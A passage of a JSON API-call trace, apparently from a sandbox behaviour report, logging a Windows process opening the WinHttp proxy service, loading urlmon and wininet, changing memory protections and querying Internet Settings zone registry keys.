"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfb,\\x04\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xf0\\xfb,\\x04i\\x1a\\x99s\\x01\\x00\\x00\\x00\\xf0\\x11\\x99s\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xfb,\\x04\\x08\\x00\\x00\\x00" } ], "repeated": 0, "id": 429 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x75b21ad2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" } ], "repeated": 0, "id": 430 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11160", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000039c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 431 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 432 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x73cded9e", "parentcaller": "0x73cc3e84", "category": "services", "api": "OpenSCManagerW", "status": true, "return": "0x0070b640", "arguments": [ { "name": "MachineName", "value": "" }, { "name": "DatabaseName", "value": "" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "SC_MANAGER_CONNECT" } ], "repeated": 0, "id": 433 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x73cdedb9", "parentcaller": "0x73cc3e84", "category": "services", "api": "OpenServiceW", "status": true, "return": "0x0070b668", "arguments": [ { "name": "ServiceControlManager", "value": "0x0070b640" }, { "name": "ServiceName", "value": "WinHttpAutoProxySvc" }, { "name": "DesiredAccess", "value": "0x00000094", "pretty_value": "SERVICE_QUERY_STATUS|SERVICE_START|SERVICE_INTERROGATE" } ], "repeated": 0, "id": 434 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x764e0018", "parentcaller": "0x76c07521", "category": "threading", "api": "NtOpenThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x000003ac" }, { "name": "DesiredAccess", "value": "0x00100010", "pretty_value": "THREAD_SET_CONTEXT|0x00100000" }, { "name": "ProcessId", "value": "3552" }, { "name": "ThreadId", "value": "11036" } ], "repeated": 0, "id": 435 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x76c084ef", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003ac" } ], "repeated": 0, "id": 436 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cdecf3", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003a8" } ], "repeated": 0, "id": 437 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003a8" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 438 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003b0" } ], "repeated": 0, "id": 439 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003b4" } ], "repeated": 0, "id": 440 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000394" } ], "repeated": 0, "id": 441 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000390" } ], "repeated": 0, "id": 442 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003a8" } ], "repeated": 0, "id": 443 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003ac" } ], "repeated": 0, "id": 444 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 8, "id": 445 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "urlmon.dll" } ], "repeated": 0, "id": 446 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\urlmon.dll" } ], "repeated": 0, "id": 447 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\urlmon.dll" } ], "repeated": 0, "id": 448 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771aeb5c", "parentcaller": "0x771ae8a8", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003b4" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\urlmon.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 449 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771aeb99", "parentcaller": "0x771ae8a8", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003b0" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000003b4" } ], "repeated": 0, "id": 450 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771a16fc", "parentcaller": "0x771a1867", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000003b0" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x726f0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x001ad000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 451 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771a02af", "parentcaller": "0x771a0a34", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 452 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771b23a8", "parentcaller": "0x771b2331", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 453 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771b23a8", "parentcaller": "0x771b2361", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 454 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771b26e6", "parentcaller": "0x7719b730", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72834000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 455 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771aebed", "parentcaller": "0x771ae8a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003b0" } ], "repeated": 0, "id": 456 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771aebf5", "parentcaller": "0x771ae8a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003b4" } ], "repeated": 0, "id": 457 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72834000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 458 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771a131c", "parentcaller": "0x771a1164", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "35" }, { "name": "ProcessInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00p\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00D\\x00a\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00c\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00e\\x00m\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00l\\x00m\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00l\\x00l\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x02" } ], "repeated": 0, "id": 459 }, { "timestamp": "2025-02-27 23:34:22,597", "thread_id": "11036", "caller": "0x771a131c", "parentcaller": "0x771a1164", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\urlmon" }, { "name": "DllBase", "value": "0x726f0000" } ], "repeated": 0, "id": 460 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "6820", "caller": "0x771a204e", "parentcaller": "0x7719ddc1", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000007c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 2, "id": 461 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02283000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 462 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764e0bbf", "parentcaller": "0x7271909d", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 463 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x727190b8", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlIsMultiSessionSku" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7717d8a0" } ], "repeated": 0, "id": 464 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 465 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72838000" }, { "name": "ModuleName", "value": "urlmon.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 466 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\urlmon" }, { "name": "BaseAddress", "value": "0x726f0000" }, { "name": "InitRoutine", "value": "0x72777390" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 467 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72f01000" }, { "name": "ModuleName", "value": "wininet.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 468 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72f01000" }, { "name": "ModuleName", "value": "wininet.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 469 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 470 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\" } ], "repeated": 0, "id": 471 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "Security_HKLM_only" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Security_HKLM_only" } ], "repeated": 0, "id": 472 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f46db", "parentcaller": "0x764f4c7b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000003c4" } ], "repeated": 0, "id": 473 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e8" }, { "name": "ObjectAttributesName", "value": "FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915" } ], "repeated": 0, "id": 474 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000002e4" }, { "name": "ObjectAttributesName", "value": "FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915" } ], "repeated": 0, "id": 475 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 476 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" } ], "repeated": 0, "id": 477 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 478 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" } ], "repeated": 0, "id": 479 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 480 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\" } ], "repeated": 0, "id": 481 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 482 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "ZoneMap\\Ranges\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\ZoneMap\\Ranges\\" } ], "repeated": 0, "id": 483 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 484 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000278" }, { "name": "ObjectAttributesName", "value": "ZoneMap\\Ranges\\" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\ZoneMap\\Ranges\\" } ], "repeated": 0, "id": 485 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 486 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000100" }, { "name": "ObjectAttributesName", "value": "ZoneMap\\Ranges\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\ZoneMap\\Ranges\\" } ], "repeated": 0, "id": 487 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764e0bbf", "parentcaller": "0x72a53079", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 488 }, { "timestamp": "2025-02-27 23:34:22,612", "thread_id": "11036", "caller": "0x764f956a", "parentcaller": "0x72a5308f", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": 